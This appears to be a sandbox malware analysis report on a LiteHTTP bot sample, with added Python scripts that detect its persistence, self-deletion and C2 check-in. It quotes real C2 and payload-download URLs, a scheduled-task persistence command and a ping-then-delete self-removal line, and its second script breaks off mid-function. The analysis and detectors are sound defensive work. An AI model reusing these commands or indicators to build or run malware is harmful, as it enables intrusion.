Windows Analysis Report
random.exe

Overview

General Information

Sample name: random.exe
Analysis ID: 1592066
MD5: e2e13615dffaff99a1d0cd9d32c4cf80
SHA1: 6b804aad52f0dfda2303dde5c0e641bb20f14fc2
SHA256: 71cfdbe5a32fb5cb2a5eff926c8b9000b231f4990b258872e7cf3a0e4c46bccf
Tags: exe, malware, trojan, user-Joker

Detection

LiteHTTP Bot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LiteHTTP Bot
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Self deletion via cmd or bat file
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • random.exe (PID: 1380 cmdline: "C:\Users\user\Desktop\random.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
    • schtasks.exe (PID: 6060 cmdline: "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cEp3d38.exe (PID: 5876 cmdline: "C:\Users\user\AppData\Roaming\cEp3d38.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
    • cmd.exe (PID: 4496 cmdline: "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 4900 cmdline: ping 1.1.1.1 -n 1 -w 4000 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • random.exe (PID: 1692 cmdline: C:\Users\user\Desktop\random.exe MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
  • random.exe (PID: 4516 cmdline: "C:\Users\user\Desktop\random.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
  • random.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\random.exe" MD5: E2E13615DFFAFF99A1D0CD9D32C4CF80)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
random.exe | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
random.exe | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen
  • 0x6f3e:$v1_1: newtask
  • 0x5cd0:$v1_7: DownloadFile
  • 0x6eb8:$cnc1: &os=
  • 0x6ec2:$cnc2: &pv=
  • 0x6ecc:$cnc3: &ip=
  • 0x6ed6:$cnc4: &cn=
  • 0x6ee0:$cnc5: &lr=
  • 0x6eea:$cnc6: &ct=
  • 0x6ef4:$cnc7: &bv=
  • 0x6f4e:$cnc8: &op=
  • 0x6f5c:$cnc9: &td=
  • 0x6f70:$cnc10: &uni=

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\OneDrive\jdownloader.exe | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
C:\Users\user\OneDrive\jdownloader.exe | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen
  • 0x6f3e:$v1_1: newtask
  • 0x5cd0:$v1_7: DownloadFile
  • 0x6eb8:$cnc1: &os=
  • 0x6ec2:$cnc2: &pv=
  • 0x6ecc:$cnc3: &ip=
  • 0x6ed6:$cnc4: &cn=
  • 0x6ee0:$cnc5: &lr=
  • 0x6eea:$cnc6: &ct=
  • 0x6ef4:$cnc7: &bv=
  • 0x6f4e:$cnc8: &op=
  • 0x6f5c:$cnc9: &td=
  • 0x6f70:$cnc10: &uni=
C:\Users\user\OneDrive\windows multimedia platform.exe | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
C:\Users\user\OneDrive\windows multimedia platform.exe | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen
  • 0x6f3e:$v1_1: newtask
  • 0x5cd0:$v1_7: DownloadFile
  • 0x6eb8:$cnc1: &os=
  • 0x6ec2:$cnc2: &pv=
  • 0x6ecc:$cnc3: &ip=
  • 0x6ed6:$cnc4: &cn=
  • 0x6ee0:$cnc5: &lr=
  • 0x6eea:$cnc6: &ct=
  • 0x6ef4:$cnc7: &bv=
  • 0x6f4e:$cnc8: &op=
  • 0x6f5c:$cnc9: &td=
  • 0x6f70:$cnc10: &uni=
C:\Users\user\OneDrive\autoit3.exe | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
(table truncated: 45 entries in total)

Source | Rule | Description | Author | Strings
00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
Process Memory Space: random.exe PID: 1380 | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security

Source | Rule | Description | Author | Strings
1.0.random.exe.cf0000.0.unpack | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
1.0.random.exe.cf0000.0.unpack | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen
  • 0x6f3e:$v1_1: newtask
  • 0x5cd0:$v1_7: DownloadFile
  • 0x6eb8:$cnc1: &os=
  • 0x6ec2:$cnc2: &pv=
  • 0x6ecc:$cnc3: &ip=
  • 0x6ed6:$cnc4: &cn=
  • 0x6ee0:$cnc5: &lr=
  • 0x6eea:$cnc6: &ct=
  • 0x6ef4:$cnc7: &bv=
  • 0x6f4e:$cnc8: &op=
  • 0x6f5c:$cnc9: &td=
  • 0x6f70:$cnc10: &uni=

                    System Summary

Sigma detected: Startup Folder File Write
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\random.exe, ProcessId: 1380, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnk
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Desktop\random.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\random.exe, ProcessId: 1380, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TaskHelper
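The process tree in the Classification section and the two Sigma events above together show the whole install-and-vanish sequence: a logon scheduled task (TaskHelper) pointing at the Desktop copy, a Run value under the WOW6432Node hive, a .lnk in the user's Startup folder, a same-hash copy launched from AppData\Roaming (cEp3d38.exe), and finally cmd.exe using ping as a four-second sleep before deleting the original. The script below is an added example written for this page, not code from Joe Sandbox or from the bot. It re-implements those checks over Sysmon-style events (EventID 1 process create, 11 file create, 13 registry set) constructed from the values in the report; the parent PIDs, the schtasks.exe image path, the list of user-writable directories and the benign control event (a logon task pointing into Program Files) are assumptions.

```python
"""Host-side triage of the behaviours seen in the random.exe process tree.

Added example. The events are constructed from the report's process tree and
Sigma hits; parent PIDs, the schtasks.exe path and the benign control are made up.
"""
import re

# Heuristic (assumption): directories an unprivileged user can write to.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:Desktop|Downloads|OneDrive|AppData\\(?:Roaming|Local))\\",
    re.IGNORECASE,
)
# "ping <host> -n 1 -w <ms> > Nul & Del <file>": ping as a sleep, then delete.
PING_SLEEP_DEL = re.compile(
    r'ping(?:\.exe)?\s+\S+\s+-n\s+\d+\s+-w\s+(?P<ms>\d+)\s*>\s*nul\s*&\s*del\s+"?(?P<path>[^"&]+)',
    re.IGNORECASE,
)
SCHTASKS_CREATE = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b', re.IGNORECASE)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)


def schtasks_opt(cmdline, name):
    """Return the value of a schtasks switch such as /SC, /TN or /TR (quoted or bare)."""
    m = re.search(rf'/{name}\s+"?([^"]+?)"?(?=\s+/|\s*$)', cmdline, re.IGNORECASE)
    return m.group(1) if m else None


def analyse(events):
    """Return (rule, pid, detail) findings for a list of Sysmon-style events."""
    findings = []
    procs = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    for e in events:
        pid = e["ProcessId"]
        if e["EventID"] == 1:
            cmd = e["CommandLine"]
            parent = procs.get(e["ParentProcessId"])
            if SCHTASKS_CREATE.search(cmd):
                run = schtasks_opt(cmd, "TR") or ""
                if (schtasks_opt(cmd, "SC") or "").upper() == "ONLOGON" and USER_WRITABLE.search(run):
                    findings.append(("logon_task_user_path", pid, schtasks_opt(cmd, "TN")))
            m = PING_SLEEP_DEL.search(cmd)
            if m:
                target = m.group("path").strip()
                # Deleting the parent's own image is the self-removal step from the report.
                rule = "self_delete" if parent and parent["Image"].lower() == target.lower() else "ping_sleep_then_delete"
                findings.append((rule, pid, f"{target} after {m.group('ms')} ms"))
            if (parent and e.get("Hashes") and e["Hashes"] == parent.get("Hashes")
                    and e["Image"].lower() != parent["Image"].lower()
                    and USER_WRITABLE.search(e["Image"])):
                findings.append(("self_copy_same_hash", pid, e["Image"]))
        elif e["EventID"] == 13 and RUN_KEY.search(e["TargetObject"]) and USER_WRITABLE.search(e["Details"]):
            findings.append(("run_key_user_path", pid, e["TargetObject"]))
        elif e["EventID"] == 11 and STARTUP_LNK.search(e["TargetFilename"]):
            findings.append(("startup_folder_lnk", pid, e["TargetFilename"]))
    return findings


# Constructed events modelled on the report (PIDs, paths, MD5s as listed there;
# parent PID 4000 and the final control event are assumptions).
EVENTS = [
    {"EventID": 1, "ProcessId": 1380, "ParentProcessId": 4000, "Image": r"C:\Users\user\Desktop\random.exe",
     "CommandLine": r'"C:\Users\user\Desktop\random.exe"', "Hashes": "MD5=E2E13615DFFAFF99A1D0CD9D32C4CF80"},
    {"EventID": 1, "ProcessId": 6060, "ParentProcessId": 1380, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r'"schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F',
     "Hashes": "MD5=48C2FE20575769DE916F48EF0676A965"},
    {"EventID": 1, "ProcessId": 5876, "ParentProcessId": 1380, "Image": r"C:\Users\user\AppData\Roaming\cEp3d38.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\cEp3d38.exe"', "Hashes": "MD5=E2E13615DFFAFF99A1D0CD9D32C4CF80"},
    {"EventID": 1, "ProcessId": 4496, "ParentProcessId": 1380, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"',
     "Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B"},
    {"EventID": 13, "ProcessId": 1380, "EventType": "SetValue", "Image": r"C:\Users\user\Desktop\random.exe",
     "TargetObject": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TaskHelper",
     "Details": r"C:\Users\user\Desktop\random.exe"},
    {"EventID": 11, "ProcessId": 1380, "Image": r"C:\Users\user\Desktop\random.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnk"},
    # Benign control (constructed): a logon task whose target lives under Program Files.
    {"EventID": 1, "ProcessId": 7000, "ParentProcessId": 4000, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /Create /SC ONLOGON /TN "Backup" /TR "C:\Program Files\Backup\agent.exe"',
     "Hashes": "MD5=48C2FE20575769DE916F48EF0676A965"},
]

if __name__ == "__main__":
    for rule, pid, detail in analyse(EVENTS):
        print(f"{rule:24} pid={pid:<5} {detail}")
```

The path filter is what keeps the control event quiet: `schtasks /SC ONLOGON` and Run-key writes are common in legitimate software, so the rule fires only when the target lives in a user-writable directory. Correlating the `Del` target with the parent's own image, and the child's hash with the parent's, is what distinguishes this sample's self-copy and self-delete from an ordinary installer cleanup.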
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T18:11:03.186880+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:05.950275+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:06.343152+0100 | 2829909 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:03.186880+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:05.950275+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:06.343152+0100 | 2819705 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:02.890852+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:05.693290+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP
2025-01-15T18:11:06.123167+0100 | 2830238 | 1 | A Network Trojan was detected | 192.168.2.9 | 59239 | 87.120.126.5 | 80 | TCP


                    AV Detection

Source: random.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\random.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\microsoft.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\autoit3.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\java.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\jdownloader.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\internet explorer.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\msecache.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\common files.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\reference assemblies.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\microsoft.net.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\google.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\microsoft office.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\OneDrive\msbuild.exe | Avira: detection malicious, Label: HEUR/AGEN.1351936
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\random.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\autoit3.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\common files.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\google.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\internet explorer.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\java.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\jdownloader.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\microsoft office.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\microsoft.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\microsoft.net.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\msbuild.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\msecache.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\reference assemblies.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows defender.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows mail.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows media player.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows multimedia platform.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows nt.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows photo viewer.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows portable devices.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windows sidebar.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\OneDrive\windowspowershell.exe | ReversingLabs: Detection: 21%
Source: random.exe | ReversingLabs: Detection: 21%
Source: random.exe | Virustotal: Detection: 31%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\random.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\autoit3.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\java.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\jdownloader.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\internet explorer.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\msecache.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\common files.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\mozilla maintenance service.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\reference assemblies.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft.net.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\google.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\microsoft office.exe | Joe Sandbox ML: detected
Source: C:\Users\user\OneDrive\msbuild.exe | Joe Sandbox ML: detected
Source: random.exe | Joe Sandbox ML: detected
Source: random.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.9:59241 version: TLS 1.2
Source: random.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdb | source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.7\Bot\LiteHTTP\obj\Debug\Anubis.pdbd | source: random.exe, windows photo viewer.exe.1.dr, windows nt.exe.1.dr, windows sidebar.exe.1.dr, random.exe.1.dr, microsoft.exe.1.dr, autoit3.exe.1.dr, java.exe.1.dr, windows mail.exe.1.dr, windowspowershell.exe.1.dr, jdownloader.exe.1.dr, internet explorer.exe.1.dr, msecache.exe.1.dr, common files.exe.1.dr, windows multimedia platform.exe.1.dr, mozilla maintenance service.exe.1.dr, windows defender.exe.1.dr, reference assemblies.exe.1.dr, windows media player.exe.1.dr, microsoft.net.exe.1.dr, mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe.1.dr, cEp3d38.exe.1.dr, google.exe.1.dr, microsoft office.exe.1.dr, msbuild.exe.1.dr, windows portable devices.exe.1.dr
Source: C:\Users\user\Desktop\random.exe | Code function: 4x nop then jmp 01512EBEh (1_2_01512DE8)
Source: C:\Users\user\Desktop\random.exe | Code function: 4x nop then jmp 01512FECh (1_2_01512FE0)
Source: C:\Users\user\Desktop\random.exe | Code function: 4x nop then jmp 01512FECh (1_2_01512ED8)
Source: C:\Users\user\Desktop\random.exe | Code function: 4x nop then jmp 01512FECh (1_2_01512EC7)

                    Networking

Source: Network traffic | Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.9:59239 -> 87.120.126.5:80
Source: Network traffic | Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.9:59239 -> 87.120.126.5:80
Source: Network traffic | Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.9:59239 -> 87.120.126.5:80
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: global traffic | TCP traffic: 192.168.2.9:59230 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /dl/19480319/anubis.exe HTTP/1.1 | Host: tmpfiles.org | Connection: Keep-Alive (2 requests)
Source: Joe Sandbox View | IP Address: 104.21.21.16
Source: Joe Sandbox View | ASN Name: UNACS-AS-BG8000BurgasBG
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 87.120.126.5 (26 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /dl/19480319/anubis.exe HTTP/1.1 | Host: tmpfiles.org | Connection: Keep-Alive (2 requests)
Source: global traffic | DNS traffic detected: DNS query: tmpfiles.org
Source: unknown | HTTP traffic detected: POST /VmCetSC7/page.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3 | Host: 87.120.126.5 | Content-Length: 367 | Expect: 100-continue | Connection: Keep-Alive
Source: random.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000032CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://87.120.126.5
Source: random.exe, 00000001.00000002.2008201035.0000000003098000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://87.120.126.5/VmCetSC7/page.php
Source: random.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpP
Source: random.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tmpfiles.org
Source: random.exe, 00000001.00000002.2008201035.0000000003315000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tmpfiles.org/dl/19480319/anubis.exe
Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tmpfiles.orgd
Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tmpfiles.org
Source: random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000001.00000002.2008201035.00000000032E3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://tmpfiles.org/dl/19480319/anubis.exe
Source: unknown | Network traffic detected: HTTP traffic on port 59241 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59241
Source: unknown | HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.9:59241 version: TLS 1.2
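The three Suricata hits and the raw request above describe what makes this check-in recognisable on the wire: a POST to a .php endpoint on a bare IP that was never resolved through DNS, a User-Agent that is a 32-character hex string rather than a product token, and a form body whose field names (&os=, &pv=, &ip=, &cn=, &lr=, &ct=, &bv=, &op=, &td=, &uni=) are the same ones the CoreBot Yara rule matches in the binary. The stage download from tmpfiles.org shows the opposite tell: no User-Agent at all. The script below is an added example written for this page, not Suricata's rule or the bot's code. The three sample requests are constructed: the check-in and download reuse the headers and URLs quoted in the report, but the POST body is built from the Yara key names with placeholder values because the real 367-byte payload is not shown, and the benign request is invented as a control.

```python
"""Classify raw HTTP requests for the LiteHTTP traits the report flags.

Added example. Sample requests are constructed from the report's headers and URLs;
the check-in body values and the benign request are made up.
"""
import re
from urllib.parse import parse_qsl

CNC_KEYS = {"os", "pv", "ip", "cn", "lr", "ct", "bv", "op", "td", "uni"}  # $cnc1..$cnc10 in the Yara rule
KNOWN_UA = {"E9BC3BD76216AFA560BFB5ACAF5731A3"}  # User-Agent seen in the sandbox check-in
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_request(raw: bytes) -> dict:
    """Split an HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers, "body": body}


def classify(raw: bytes) -> list:
    """Return the list of suspicious traits found in one request."""
    req = parse_request(raw)
    hdr = req["headers"]
    tags = []
    ua = hdr.get("user-agent")
    if ua is None:
        tags.append("no_user_agent")            # the anubis.exe download carries no UA
    else:
        if ua in KNOWN_UA:
            tags.append("known_litehttp_ua")
        if HEX32.match(ua):
            tags.append("hex32_user_agent")     # hash-shaped UA instead of a product token
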